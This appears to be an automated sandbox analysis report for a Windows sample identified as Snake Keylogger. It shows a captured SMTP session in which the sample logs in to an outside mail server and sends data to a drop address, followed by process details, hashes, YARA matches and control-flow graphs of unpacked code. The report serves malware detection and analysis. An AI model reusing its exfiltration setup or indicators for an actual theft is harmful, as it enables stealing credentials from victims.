                                                                    Apr 8, 2024 10:03:47.762252092 CEST58749728208.91.199.225192.168.2.5334 UGFzc3dvcmQ6
                                                                    Apr 8, 2024 10:03:49.157191992 CEST58749728208.91.199.225192.168.2.5235 2.7.0 Authentication successful
                                                                    Apr 8, 2024 10:03:49.157516956 CEST49728587192.168.2.5208.91.199.225MAIL FROM:<tslogs@mksiimst.com>
                                                                    Apr 8, 2024 10:03:49.358012915 CEST58749728208.91.199.225192.168.2.5250 2.1.0 Ok
                                                                    Apr 8, 2024 10:03:49.358366966 CEST49728587192.168.2.5208.91.199.225RCPT TO:<tslogs@mksiimst.com>
                                                                    Apr 8, 2024 10:03:49.573837042 CEST58749728208.91.199.225192.168.2.5250 2.1.5 Ok
                                                                    Apr 8, 2024 10:03:49.574067116 CEST49728587192.168.2.5208.91.199.225DATA
                                                                    Apr 8, 2024 10:03:49.772804976 CEST58749728208.91.199.225192.168.2.5354 End data with <CR><LF>.<CR><LF>
                                                                    Apr 8, 2024 10:03:49.773704052 CEST49728587192.168.2.5208.91.199.225.
                                                                    Apr 8, 2024 10:03:50.093750000 CEST58749728208.91.199.225192.168.2.5250 2.0.0 Ok: queued as 7383D640698
                                                                    Apr 8, 2024 10:05:26.598421097 CEST49728587192.168.2.5208.91.199.225QUIT
                                                                    Apr 8, 2024 10:05:26.796036005 CEST58749728208.91.199.225192.168.2.5221 2.0.0 Bye

                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Target ID:0
                                                                    Start time:10:02:56
                                                                    Start date:08/04/2024
                                                                    Path:C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Zarefy4bOs.exe"
                                                                    Imagebase:0x420000
                                                                    File size:133'120 bytes
                                                                    MD5 hash:EB9D9BC525BF2CFD5A566FF1939A65D8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4461938228.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:19.4%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:65.8%
                                                                      Total number of Nodes:38
                                                                      Total number of Limit Nodes:4
                                                                      execution_graph 18720 266d3d0 18721 266d3dc 18720->18721 18725 2760d60 18721->18725 18732 2760d50 18721->18732 18722 266d497 18726 2760d82 18725->18726 18727 2760e4e 18726->18727 18739 2767987 18726->18739 18745 2767988 18726->18745 18749 2767ba8 18726->18749 18755 2767f8c 18726->18755 18727->18722 18733 2760d82 18732->18733 18734 2760e4e 18733->18734 18735 2767987 2 API calls 18733->18735 18736 2767f8c 2 API calls 18733->18736 18737 2767ba8 2 API calls 18733->18737 18738 2767988 LdrInitializeThunk 18733->18738 18734->18722 18735->18734 18736->18734 18737->18734 18738->18734 18740 276799a 18739->18740 18744 276799f 18739->18744 18740->18727 18741 2767f84 LdrInitializeThunk 18741->18740 18743 2767988 LdrInitializeThunk 18743->18744 18744->18740 18744->18741 18744->18743 18746 276799a 18745->18746 18747 276799f 18745->18747 18746->18727 18747->18746 18748 27680c9 LdrInitializeThunk 18747->18748 18748->18746 18751 2767bd9 18749->18751 18750 2767d39 18750->18727 18751->18750 18752 2767f84 LdrInitializeThunk 18751->18752 18754 2767988 LdrInitializeThunk 18751->18754 18752->18750 18754->18751 18760 2767e43 18755->18760 18756 2767f84 LdrInitializeThunk 18758 27680e1 18756->18758 18758->18727 18759 2767988 LdrInitializeThunk 18759->18760 18760->18756 18760->18759 18761 2768278 18762 276827d 18761->18762 18763 2767988 LdrInitializeThunk 18762->18763 18764 2768285 18762->18764 18766 2768606 18762->18766 18763->18766 18765 2767988 LdrInitializeThunk 18765->18766 18766->18764 18766->18765

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 146 26621a8-2662203 150 2662225-2662274 146->150 151 2662205-2662224 146->151 155 2662276-266227d 150->155 156 266228f-2662297 150->156 157 2662286-266228d 155->157 158 266227f-2662284 155->158 159 266229a-26622ae 156->159 157->159 158->159 162 26622c4-26622cc 159->162 163 26622b0-26622b7 159->163 166 26622ce-26622d2 162->166 164 26622bd-26622c2 163->164 165 26622b9-26622bb 163->165 164->166 165->166 168 26622d4-26622e9 166->168 169 2662332-2662335 166->169 168->169 175 26622eb-26622ee 168->175 170 2662337-266234c 169->170 171 266237d-2662383 169->171 170->171 178 266234e-2662352 170->178 173 2662e7e 171->173 174 2662389-266238b 171->174 181 2662e83-2663499 173->181 174->173 176 2662391-2662396 174->176 179 26622f0-26622f2 175->179 180 266230d-266232b call 26602b8 175->180 182 2662e2c-2662e30 176->182 183 266239c 176->183 184 2662354-2662358 178->184 185 266235a-2662378 call 26602b8 178->185 179->180 186 26622f4-26622f7 179->186 180->169 210 26634aa-26634b2 181->210 211 266349b-266349d 181->211 188 2662e37-2662e7d 182->188 189 2662e32-2662e35 182->189 183->182 184->171 184->185 185->171 186->169 191 26622f9-266230b 186->191 189->181 189->188 191->169 191->180 215 26634b4-26634c2 210->215 212 26634a3-26634a8 211->212 213 266349f-26634a1 211->213 212->215 213->215 217 26634c4-26634c6 215->217 218 26634d8-26634e0 215->218 219 26634cf-26634d6 217->219 220 26634c8-26634cd 217->220 221 26634e3-26634e6 218->221 219->221 220->221 223 26634fd-2663501 221->223 224 26634e8-26634f6 221->224 225 2663503-2663511 223->225 226 266351a-266351d 223->226 224->223 232 26634f8 224->232 225->226 233 2663513 225->233 227 2663525-266355a 226->227 228 266351f-2663523 226->228 237 26635bc-26635c1 227->237 228->227 231 266355c-2663573 228->231 234 2663575-2663577 231->234 235 2663579-2663585 231->235 232->223 233->226 234->237 238 2663587-266358d 235->238 239 266358f-2663599 235->239 241 26635a1 238->241 239->241 242 266359b 239->242 244 26635a9-26635b5 241->244 242->241 244->237
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Xaq$Xaq$Xaq$Xaq$Xaq$Xaq
                                                                      • API String ID: 0-499371476
                                                                      • Opcode ID: bf54264b7fc00d10394155ac4adc419bc0aa1a7920f32610d7b3a2c478007ca8
                                                                      • Instruction ID: 461ec7459697ddae59f4d43edaa75b3510e25abc299c56b704f48ac46ca04f17
                                                                      • Opcode Fuzzy Hash: bf54264b7fc00d10394155ac4adc419bc0aa1a7920f32610d7b3a2c478007ca8
                                                                      • Instruction Fuzzy Hash: 3E52C0229087D44BE72657B8447A3E7BFF4DFA6320F0C88DDD8C64BA07E6286656C341
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 247 2666790-26667c6 248 26667ce-26667d4 247->248 371 26667c8 call 2666790 247->371 372 26667c8 call 26668e0 247->372 373 26667c8 call 2666168 247->373 249 26667d6-26667da 248->249 250 2666824-2666828 248->250 253 26667dc-26667e1 249->253 254 26667e9-26667f0 249->254 251 266683f-2666853 250->251 252 266682a-2666839 250->252 257 266685b-2666862 251->257 375 2666855 call 26698b1 251->375 376 2666855 call 26698b8 251->376 255 2666865-266686f 252->255 256 266683b-266683d 252->256 253->254 258 26668c6-2666903 254->258 259 26667f6-26667fd 254->259 260 2666871-2666877 255->260 261 2666879-266687d 255->261 256->257 269 2666905-266690b 258->269 270 266690e-266692e 258->270 259->250 262 26667ff-2666803 259->262 263 2666885-26668bf 260->263 261->263 265 266687f 261->265 266 2666805-266680a 262->266 267 2666812-2666819 262->267 263->258 265->263 266->267 267->258 268 266681f-2666822 267->268 268->257 269->270 275 2666935-266693c 270->275 276 2666930 270->276 279 266693e-2666949 275->279 278 2666cc4-2666ccd 276->278 280 2666cd5-2666ce1 279->280 281 266694f-2666962 279->281 286 2666964-2666972 281->286 287 2666978-2666993 281->287 286->287 290 2666c4c-2666c53 286->290 291 26669b7-26669ba 287->291 292 2666995-266699b 287->292 290->278 297 2666c55-2666c57 290->297 293 2666b14-2666b1a 291->293 294 26669c0-26669c3 291->294 295 26669a4-26669a7 292->295 296 266699d 292->296 298 2666c06-2666c09 293->298 299 2666b20-2666b25 293->299 294->293 300 26669c9-26669cf 294->300 301 26669da-26669e0 295->301 302 26669a9-26669ac 295->302 296->293 296->295 296->298 296->301 303 2666c66-2666c6c 297->303 304 2666c59-2666c5e 297->304 309 2666cd0 298->309 310 2666c0f-2666c15 298->310 299->298 300->293 308 26669d5 300->308 311 26669e6-26669e8 301->311 312 26669e2-26669e4 301->312 305 2666a46-2666a4c 302->305 306 26669b2 302->306 303->280 307 2666c6e-2666c73 303->307 304->303 305->298 315 2666a52-2666a58 305->315 306->298 313 2666c75-2666c7a 307->313 314 2666cb8-2666cbb 307->314 308->298 309->280 316 2666c17-2666c1f 310->316 317 2666c3a-2666c3e 310->317 318 26669f2-26669fb 311->318 312->318 313->309 320 2666c7c 313->320 314->309 319 2666cbd-2666cc2 314->319 321 2666a5e-2666a60 315->321 322 2666a5a-2666a5c 315->322 316->280 323 2666c25-2666c34 316->323 317->290 326 2666c40-2666c46 317->326 324 2666a0e-2666a36 318->324 325 26669fd-2666a08 318->325 319->278 319->297 327 2666c83-2666c88 320->327 328 2666a6a-2666a81 321->328 322->328 323->287 323->317 346 2666a3c-2666a41 324->346 347 2666b2a-2666b60 324->347 325->298 325->324 326->279 326->290 329 2666caa-2666cac 327->329 330 2666c8a-2666c8c 327->330 340 2666a83-2666a9c 328->340 341 2666aac-2666ad3 328->341 329->309 337 2666cae-2666cb1 329->337 334 2666c8e-2666c93 330->334 335 2666c9b-2666ca1 330->335 334->335 335->280 339 2666ca3-2666ca8 335->339 337->314 339->329 342 2666c7e-2666c81 339->342 340->347 350 2666aa2-2666aa7 340->350 341->309 352 2666ad9-2666adc 341->352 342->309 342->327 346->347 353 2666b62-2666b66 347->353 354 2666b6d-2666b75 347->354 350->347 352->309 355 2666ae2-2666b0b 352->355 356 2666b85-2666b89 353->356 357 2666b68-2666b6b 353->357 354->309 358 2666b7b-2666b80 354->358 355->347 370 2666b0d-2666b12 355->370 359 2666b8b-2666b91 356->359 360 2666ba8-2666bac 356->360 357->354 357->356 358->298 359->360 362 2666b93-2666b9b 359->362 363 2666bb6-2666bd5 call 2666eb8 360->363 364 2666bae-2666bb4 360->364 362->309 366 2666ba1-2666ba6 362->366 365 2666bdb-2666bdf 363->365 364->363 364->365 365->298 368 2666be1-2666bfd 365->368 366->298 368->298 370->347 371->248 372->248 373->248 375->257 376->257
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (o]q$(o]q$(o]q$,aq$,aq
                                                                      • API String ID: 0-615190528
                                                                      • Opcode ID: ff7fcede6f5dbd7debbf2cb0d2b7402ce7b4006a93a716cd93f3f2c5569bb93c
                                                                      • Instruction ID: f5299e060026c4a0907c2f655bd2b2b136f386de0cfc914bd5d4f340a6319f43
                                                                      • Opcode Fuzzy Hash: ff7fcede6f5dbd7debbf2cb0d2b7402ce7b4006a93a716cd93f3f2c5569bb93c
                                                                      • Instruction Fuzzy Hash: 8C023D70A00519DFCB14CFA9E988ABDBBBAFF88304F158469E405AB361D739D951CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 487 266b388-266b39b 488 266b3a1-266b3aa 487->488 489 266b4da-266b4e1 487->489 490 266b4e4 488->490 491 266b3b0-266b3b4 488->491 496 266b4e9-266b4f1 490->496 492 266b3b6 491->492 493 266b3ce-266b3d5 491->493 494 266b3b9-266b3c4 492->494 493->489 495 266b3db-266b3e8 493->495 494->490 497 266b3ca-266b3cc 494->497 495->489 502 266b3ee-266b401 495->502 500 266b562-266b580 496->500 501 266b4f3-266b510 496->501 497->493 497->494 507 266b587-266b664 call 2663960 call 2663480 500->507 508 266b582 500->508 505 266b512-266b52a 501->505 506 266b53c 501->506 503 266b406-266b40e 502->503 504 266b403 502->504 509 266b410-266b416 503->509 510 266b47b-266b47d 503->510 504->503 522 266b533-266b536 505->522 523 266b52c-266b531 505->523 511 266b53e-266b542 506->511 550 266b666 507->550 551 266b66b-266b68c call 2664e20 507->551 508->507 509->510 513 266b418-266b41e 509->513 510->489 512 266b47f-266b485 510->512 512->489 516 266b487-266b491 512->516 513->496 517 266b424-266b43c 513->517 516->496 518 266b493-266b4ab 516->518 532 266b43e-266b444 517->532 533 266b469-266b46c 517->533 536 266b4d0-266b4d3 518->536 537 266b4ad-266b4b3 518->537 527 266b543-266b561 522->527 528 266b538-266b53a 522->528 523->511 527->500 528->505 528->506 532->496 538 266b44a-266b45e 532->538 533->490 539 266b46e-266b471 533->539 536->490 543 266b4d5-266b4d8 536->543 537->496 541 266b4b5-266b4c9 537->541 538->496 546 266b464 538->546 539->490 540 266b473-266b479 539->540 540->509 540->510 541->496 548 266b4cb 541->548 543->489 543->516 546->533 548->536 550->551 553 266b691-266b69c 551->553 554 266b6a3-266b6a7 553->554 555 266b69e 553->555 556 266b6ac-266b6b3 554->556 557 266b6a9-266b6aa 554->557 555->554 559 266b6b5 556->559 560 266b6ba-266b6c8 556->560 558 266b6cb-266b70f 557->558 564 266b775-266b78c 558->564 559->560 560->558 566 266b711-266b727 564->566 567 266b78e-266b7b3 564->567 571 266b751 566->571 572 266b729-266b735 566->572 573 266b7b5-266b7ca 567->573 574 266b7cb 567->574 577 266b757-266b774 571->577 575 266b737-266b73d 572->575 576 266b73f-266b745 572->576 573->574 580 266b7cc 574->580 578 266b74f 575->578 576->578 577->564 578->577 580->580
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                      • API String ID: 0-1229222154
                                                                      • Opcode ID: 065446ca811fc0c2bded71453673dae1f11dfd2d9e5f71b2dcacecc4596eb42c
                                                                      • Instruction ID: c7f1887524b047039c00f7a1def95235485b85ea74f84537ec38c44ce1937455
                                                                      • Opcode Fuzzy Hash: 065446ca811fc0c2bded71453673dae1f11dfd2d9e5f71b2dcacecc4596eb42c
                                                                      • Instruction Fuzzy Hash: 60E10A74A00258CFDB14CFA9D998AADBBB1FF49314F1580A9E809EB365DB30E941CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 583 266c1f0-266c1f5 584 266c266 583->584 585 266c1f7-266c220 583->585 588 266c267-266c304 call 2663960 call 2663480 584->588 589 266c250-266c262 584->589 586 266c227-266c24f 585->586 587 266c222 585->587 586->589 587->586 599 266c306 588->599 600 266c30b-266c32c call 2664e20 588->600 589->584 599->600 602 266c331-266c33c 600->602 603 266c343-266c347 602->603 604 266c33e 602->604 605 266c34c-266c353 603->605 606 266c349-266c34a 603->606 604->603 607 266c355 605->607 608 266c35a-266c368 605->608 609 266c36b-266c3af 606->609 607->608 608->609 613 266c415-266c42c 609->613 615 266c3b1-266c3c7 613->615 616 266c42e-266c453 613->616 620 266c3f1 615->620 621 266c3c9-266c3d5 615->621 623 266c455-266c46a 616->623 624 266c46b 616->624 622 266c3f7-266c414 620->622 625 266c3d7-266c3dd 621->625 626 266c3df-266c3e5 621->626 622->613 623->624 627 266c3ef 625->627 626->627 627->622
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                      • API String ID: 0-1229222154
                                                                      • Opcode ID: 6db977528e486b79c54b37bd80cee357240a1fb151ab818ba90eb7229516133a
                                                                      • Instruction ID: 7956fb1bc966e5ded6312821fa411099ca9aa10f80f3e4e88bd0e2d56028b2e8
                                                                      • Opcode Fuzzy Hash: 6db977528e486b79c54b37bd80cee357240a1fb151ab818ba90eb7229516133a
                                                                      • Instruction Fuzzy Hash: FB91EB74E00658CFDB14DFA9D998AADBBF2BF88300F14C06AE845AB365DB309941CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 631 266bf10-266bf11 632 266bf82 631->632 633 266bf13-266bf15 631->633 634 266bf86 632->634 633->634 635 266bf17-266bf40 633->635 638 266bf87-266bf93 634->638 639 266bf70-266bf81 634->639 636 266bf47-266bf6f 635->636 637 266bf42 635->637 636->639 637->636 642 266bf95-266bfa6 call 2663960 638->642 643 266bff0-266c024 638->643 639->632 645 266bfab-266bfee call 2663480 642->645 650 266c026 643->650 651 266c02b-266c04c call 2664e20 643->651 645->643 650->651 654 266c051-266c05c 651->654 655 266c063-266c067 654->655 656 266c05e 654->656 657 266c06c-266c073 655->657 658 266c069-266c06a 655->658 656->655 660 266c075 657->660 661 266c07a-266c088 657->661 659 266c08b-266c0cf 658->659 665 266c135-266c14c 659->665 660->661 661->659 667 266c0d1-266c0e7 665->667 668 266c14e-266c173 665->668 672 266c111 667->672 673 266c0e9-266c0f5 667->673 674 266c175-266c18a 668->674 675 266c18b 668->675 678 266c117-266c134 672->678 676 266c0f7-266c0fd 673->676 677 266c0ff-266c105 673->677 674->675 679 266c10f 676->679 677->679 678->665 679->678
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                      • API String ID: 0-1229222154
                                                                      • Opcode ID: 9273270f299ad3003b990b8cf013d6f4fca6b5f1656a5ad45dda95d99e37b636
                                                                      • Instruction ID: 2fa9347ca36d1c459dd9be201e86a1923753830dcee62c721e3f96ef648e6898
                                                                      • Opcode Fuzzy Hash: 9273270f299ad3003b990b8cf013d6f4fca6b5f1656a5ad45dda95d99e37b636
                                                                      • Instruction Fuzzy Hash: BF91F974E00648CFDB14DFAAD988AADBBF2BF89304F14C06AD845AB365DB359941CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 683 266ca92-266ca9c 684 266caf3-266cba4 call 2663960 call 2663480 683->684 685 266ca9e-266cac0 683->685 697 266cba6 684->697 698 266cbab-266cbcc call 2664e20 684->698 686 266cac7-266caf1 685->686 687 266cac2 685->687 686->684 687->686 697->698 700 266cbd1-266cbdc 698->700 701 266cbe3-266cbe7 700->701 702 266cbde 700->702 703 266cbec-266cbf3 701->703 704 266cbe9-266cbea 701->704 702->701 706 266cbf5 703->706 707 266cbfa-266cc08 703->707 705 266cc0b-266cc4f 704->705 711 266ccb5-266cccc 705->711 706->707 707->705 713 266cc51-266cc67 711->713 714 266ccce-266ccf3 711->714 718 266cc91 713->718 719 266cc69-266cc75 713->719 721 266ccf5-266cd0a 714->721 722 266cd0b 714->722 720 266cc97-266ccb4 718->720 723 266cc77-266cc7d 719->723 724 266cc7f-266cc85 719->724 720->711 721->722 725 266cc8f 723->725 724->725 725->720
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                      • API String ID: 0-1229222154
                                                                      • Opcode ID: f5804f1157f21d44f022ed143e3c0d7b3a46af8ca3359a9a1e6807dce6c90dd3
                                                                      • Instruction ID: 4c580400d6b651a706110e0644e9e4ea883af3909e7a9581e2bfedc2f09011a5
                                                                      • Opcode Fuzzy Hash: f5804f1157f21d44f022ed143e3c0d7b3a46af8ca3359a9a1e6807dce6c90dd3
                                                                      • Instruction Fuzzy Hash: DA81EA74E01618DFDB14DFA9D988AADBBF2BF89300F14C06AD849AB365DB349941CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 774 266c7b2-266c7e0 775 266c7e7-266c8c4 call 2663960 call 2663480 774->775 776 266c7e2 774->776 786 266c8c6 775->786 787 266c8cb-266c8ec call 2664e20 775->787 776->775 786->787 789 266c8f1-266c8fc 787->789 790 266c903-266c907 789->790 791 266c8fe 789->791 792 266c90c-266c913 790->792 793 266c909-266c90a 790->793 791->790 795 266c915 792->795 796 266c91a-266c928 792->796 794 266c92b-266c96f 793->794 800 266c9d5-266c9ec 794->800 795->796 796->794 802 266c971-266c987 800->802 803 266c9ee-266ca13 800->803 807 266c9b1 802->807 808 266c989-266c995 802->808 809 266ca15-266ca2a 803->809 810 266ca2b 803->810 813 266c9b7-266c9d4 807->813 811 266c997-266c99d 808->811 812 266c99f-266c9a5 808->812 809->810 814 266c9af 811->814 812->814 813->800 814->813
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                      • API String ID: 0-1229222154
                                                                      • Opcode ID: 708cd47a22ce743d41a752c345dd1220ccc32cec2bae2cbb74bcfc099a6f43ce
                                                                      • Instruction ID: a605adfe09a349234a61efda994e6c6fc47f98b7ad6bddbbad1a196a94a79927
                                                                      • Opcode Fuzzy Hash: 708cd47a22ce743d41a752c345dd1220ccc32cec2bae2cbb74bcfc099a6f43ce
                                                                      • Instruction Fuzzy Hash: A981D674E016088FDB14DFA9D998BADBBF2BF89300F14C16AD849A7365DB309941CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 729 2664b31-2664b60 730 2664b67-2664c44 call 2663960 call 2663480 729->730 731 2664b62 729->731 741 2664c46 730->741 742 2664c4b-2664c69 730->742 731->730 741->742 772 2664c6c call 2664e20 742->772 773 2664c6c call 2664e11 742->773 743 2664c72-2664c7d 744 2664c84-2664c88 743->744 745 2664c7f 743->745 746 2664c8d-2664c94 744->746 747 2664c8a-2664c8b 744->747 745->744 749 2664c96 746->749 750 2664c9b-2664ca9 746->750 748 2664cac-2664cf0 747->748 754 2664d56-2664d6d 748->754 749->750 750->748 756 2664cf2-2664d08 754->756 757 2664d6f-2664d94 754->757 761 2664d32 756->761 762 2664d0a-2664d16 756->762 763 2664d96-2664dab 757->763 764 2664dac 757->764 767 2664d38-2664d55 761->767 765 2664d20-2664d26 762->765 766 2664d18-2664d1e 762->766 763->764 768 2664d30 765->768 766->768 767->754 768->767 772->743 773->743
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                      • API String ID: 0-1229222154
                                                                      • Opcode ID: 2218cdc9b5f85ef24abcfdd5419f6192bc2b96d19b51047a3dcfc460d00485fb
                                                                      • Instruction ID: 93c92d9016609849d16ac53ec0e0241b2a7bf1530f21103ae9965bc72420359e
                                                                      • Opcode Fuzzy Hash: 2218cdc9b5f85ef24abcfdd5419f6192bc2b96d19b51047a3dcfc460d00485fb
                                                                      • Instruction Fuzzy Hash: 4E81C674E00218DFDB18DFA9D994AADBBF2BF89300F14C069E819AB365DB349941CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 818 266c4d0-266c500 819 266c507-266c5e4 call 2663960 call 2663480 818->819 820 266c502 818->820 830 266c5e6 819->830 831 266c5eb-266c60c call 2664e20 819->831 820->819 830->831 833 266c611-266c61c 831->833 834 266c623-266c627 833->834 835 266c61e 833->835 836 266c62c-266c633 834->836 837 266c629-266c62a 834->837 835->834 839 266c635 836->839 840 266c63a-266c648 836->840 838 266c64b-266c68f 837->838 844 266c6f5-266c70c 838->844 839->840 840->838 846 266c691-266c6a7 844->846 847 266c70e-266c733 844->847 850 266c6d1 846->850 851 266c6a9-266c6b5 846->851 853 266c735-266c74a 847->853 854 266c74b 847->854 857 266c6d7-266c6f4 850->857 855 266c6b7-266c6bd 851->855 856 266c6bf-266c6c5 851->856 853->854 858 266c6cf 855->858 856->858 857->844 858->857
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4459227099.0000000002660000.00000040.00000800.00020000.00000000.sdmp, Offset: 02660000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2660000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                      • API String ID: 0-1229222154
                                                                      • Opcode ID: 30d9885baf3cde6c8c838240979b735e8b01b9f7028f788589b3785b37d6c8be
                                                                      • Instruction ID: 0bfea66ce0b33b39eecf8145f2ffd07868ecd5075acbad35495fe6f6292757a8
                                                                      • Opcode Fuzzy Hash: 30d9885baf3cde6c8c838240979b735e8b01b9f7028f788589b3785b37d6c8be
                                                                      • Instruction Fuzzy Hash: FF81D774E00608DFDB14DFA9D988AADBBF2BF89300F14D069D449AB365DB349941CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.4461890492.0000000002760000.00000040.00000800.00020000.00000000.sdmp, Offset: 02760000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2760000_Zarefy4bOs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: N
                                                                      • API String ID: 0-1130791706
                                                                      • Opcode ID: 8f1deaaebeea68e6ab6bd8a47f6b78f15ce9afb81af2b39ec566cd9f5ea6f3fb
                                                                      • Instruction ID: aaf190279dbff399c7300e844e4920a959ab4b743dd05f21cd6ef72a66d9f04d
                                                                      • Opcode Fuzzy Hash: 8f1deaaebeea68e6ab6bd8a47f6b78f15ce9afb81af2b39ec566cd9f5ea6f3fb
                                                                      • Instruction Fuzzy Hash: 6A73D431D1075A8ECB11EF68C854AADFBB1FF99300F51D69AE44867221EB70AAD4CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
